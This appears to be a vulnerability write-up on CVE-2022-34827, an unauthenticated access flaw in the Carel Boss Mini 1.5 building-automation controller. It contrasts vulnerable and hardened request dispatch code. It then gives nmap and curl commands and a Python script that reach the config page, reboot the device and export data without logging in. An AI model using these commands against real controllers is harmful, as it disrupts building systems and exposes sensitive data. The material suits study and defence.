---

Quick Summary:
CVE-2022-34827 is a serious security vulnerability found in the Carel Boss Mini 1.5. industrial controller. Because of improper access control, unauthenticated users can reach restricted functions, leaving the device wide open to attack.

What Is Carel Boss Mini?

Carel Boss Mini is a web-based interface used in building automation, often found in HVAC and remote monitoring solutions. It lets facility managers check and control building systems from anywhere.

Impact: Attackers can change system settings, read sensitive data, and even reset devices.

- CVE Entry: NIST NVD - CVE-2022-34827

How Does Improper Access Control Happen?

Access control means the software should check who you are before letting you do certain things. In Carel Boss Mini 1.5., some important pages and API endpoints skip this check entirely. That means anyone, not just admins but literally anyone who can reach the web interface, can open these URLs and invoke the functions behind them.
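To make the missing-check pattern concrete, here is an added illustration (not Carel's code; the route names reuse the paths listed on this page, and the session store is constructed): a dispatcher that trusts each handler to check the session on its own, beside a deny-by-default gate that runs before any route and logs every refusal.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Paths this page lists as reachable without a session (assumed route names).
PRIVILEGED = {"/config.html", "/system/reboot.cgi",
              "/settings/export.cgi", "/user/addUser.cgi"}
PUBLIC = {"/login.html"}
VALID_SESSIONS = {"sess-adm1n-c0nstructed"}   # constructed sample session store
AUDIT: List[str] = []                         # denied attempts, for detection

@dataclass
class Request:
    path: str
    session: Optional[str] = None   # session cookie value, if one was sent

def handle(path: str) -> Tuple[int, str]:
    """Business logic only: it never checks who is asking."""
    if path in PRIVILEGED or path in PUBLIC:
        return 200, f"served {path}"
    return 404, "not found"

def vulnerable_dispatch(req: Request) -> Tuple[int, str]:
    """Fail-open pattern: every handler must remember its own check.
    Here only addUser.cgi remembers; the other privileged routes do not."""
    if req.path == "/user/addUser.cgi" and req.session not in VALID_SESSIONS:
        return 401, "login required"
    return handle(req.path)

def hardened_dispatch(req: Request) -> Tuple[int, str]:
    """Fail-closed pattern: one gate in front of all routes. Anything not on
    the PUBLIC allow-list needs a valid session, and refusals are logged."""
    if req.path not in PUBLIC and req.session not in VALID_SESSIONS:
        AUDIT.append(f"denied {req.path} (no valid session)")
        return 401, "login required"
    return handle(req.path)
```

The difference is where the check lives: per handler, where one forgotten line exposes a route, versus one gate that every request must pass.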

Example: Bypassing Login to Access Restricted Page

Let’s say the device runs at http://192.168.1.100.

- Normally, you'd see a login page at http://192.168.1.100/login.html.

Sensitive URLs (examples)

- /config.html
- /system/reboot.cgi
- /settings/export.cgi
- /user/addUser.cgi

Scan the device to find exposed web pages

```bash
nmap -p 80 192.168.1.100 --script http-enum
```

Let's view the configuration page without authentication

```bash
curl http://192.168.1.100/config.html
```

Triggering a reboot is as easy as

```bash
curl http://192.168.1.100/system/reboot.cgi
```

*Result:* The device restarts, likely with zero audit trail.

You can fetch all saved data

```bash
curl -O http://192.168.1.100/settings/export.cgi
```

Here's a quick script to check multiple URLs for unauthenticated access

```python
import requests

# Base URL of the device under test
TARGET = 'http://192.168.1.100'

# Endpoints that should require a logged-in session
urls = [
    '/config.html',
    '/system/reboot.cgi',
    '/settings/export.cgi',
    '/user/addUser.cgi'
]

for url in urls:
    # Plain GET with no cookies or credentials; timeout so a dead host doesn't hang the loop
    r = requests.get(TARGET + url, timeout=5)
    if r.status_code == 200:
        print(f"[+] Unprotected: {url}")
    else:
        print(f"[-] Protected or Not Found: {url}")
```

Are You Affected?

Product: Carel Boss Mini
Version: 1.5.
Vendor advisory: GitHub Issue: Carel Boss Mini Unrestricted Critical Functions (unofficial)

Original References

- NVD: CVE-2022-34827
- IoT Inspector – Carel Boss Mini 1.5. Vulnerability
- Carel Boss Mini Product Information

Conclusion

CVE-2022-34827 is a critical bug that is easy to exploit and has a severe impact on the security of building automation. If you have a Carel Boss Mini 1.5., lock down access now and talk to your vendor. Industrial devices like these are low-hanging fruit for attackers, and real-world attacks often start here.

Timeline

Published on: 11/18/2022 23:15:00 UTC
Last modified on: 08/08/2023 14:21:00 UTC